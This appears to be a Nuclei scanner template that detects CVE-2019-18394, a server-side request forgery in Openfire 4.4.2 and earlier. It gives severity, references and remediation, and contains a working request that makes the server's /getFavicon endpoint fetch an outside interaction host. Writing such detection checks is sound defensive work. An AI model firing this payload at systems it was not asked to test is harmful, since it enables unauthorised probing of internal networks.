41 lines
1.6 KiB
YAML
41 lines
1.6 KiB
YAML
id: CVE-2019-18394
|
|
|
|
info:
|
|
name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
|
|
author: pdteam
|
|
severity: critical
|
|
description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
|
|
remediation: |
|
|
Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
|
|
reference:
|
|
- https://swarm.ptsecurity.com/openfire-admin-console/
|
|
- https://github.com/igniterealtime/Openfire/pull/1497
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2019-18394
|
|
cwe-id: CWE-918
|
|
epss-score: 0.62096
|
|
epss-percentile: 0.97511
|
|
cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: igniterealtime
|
|
product: openfire
|
|
tags: cve,cve2019,ssrf,openfire,oast,igniterealtime
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/getFavicon?host=http://oast.fun/"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body, 'Interactsh Server')"
|
|
- status_code == 200
|
|
condition: and
|
|
# digest: 4b0a00483046022100a527f0ea9bcdb000055ed2dbcc170bf51cf90b7990e8a91e31d8893a4f2f0fc1022100fef6cf8de9e2cf74fd4050516cfa6733b80de10981da2d22fbe0ab95a7de6324:922c64590222798bb761d5b6d8e72950 |